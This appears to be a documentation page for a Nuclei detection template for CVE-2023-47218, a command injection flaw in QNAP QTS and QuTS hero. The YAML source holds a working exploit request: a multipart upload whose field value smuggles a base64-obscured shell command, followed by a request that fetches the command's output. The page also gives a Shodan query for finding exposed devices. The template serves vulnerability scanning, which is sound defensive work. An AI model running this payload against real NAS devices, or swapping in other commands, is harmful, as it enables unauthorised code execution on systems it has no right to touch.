Skip to content
Nuclei Templates

QNAP QTS and QuTS Hero - OS Command Injection

ID: CVE-2023-47218

Severity: medium

Author: ritikchaddha

Tags: cve,cve2023,qnap,qts,quts,rce,intrusive

Description

Section titled “Description”

An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.

YAML Source

Section titled “YAML Source”
id: CVE-2023-47218


info:
  name: QNAP QTS and QuTS Hero  - OS Command Injection
  author: ritikchaddha
  severity: medium
  description: |
    An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.
  reference:
    - https://github.com/passwa11/CVE-2023-47218
    - https://twitter.com/win3zz/status/1760224052289888668/photo/3
    - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47218
    - https://www.qnap.com/en/security-advisory/qsa-23-57
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 5.8
    cve-id: CVE-2023-47218
    cwe-id: CWE-77
    epss-score: 0.00305
    epss-percentile: 0.69699
    cpe: cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"
    product: qts
    vendor: qnap
  tags: cve,cve2023,qnap,qts,quts,rce,intrusive
variables:
  file: '{{rand_base(6)}}'
  cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22'


http:
  - raw:
      - |
        POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary="avssqwfz"


        --avssqwfz
        Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}"
        Content-Type: text/plain


        skfqduny
        --avssqwfz–


      - |
        POST /cgi-bin/quick/{{file}} HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_1, "code\": 200", "full_path_filename success")'
          - 'contains_all(body_2, "uid=", "gid=")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100ee6f2926f68873ab0857fa464fe7333b1c523c8b451961638797d097ea5e5e3a022100c6861c25689276ca1020e51ce64e2df6139a4e6551b25f4d161ccedd1e012b58:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-47218.yaml"

View on Github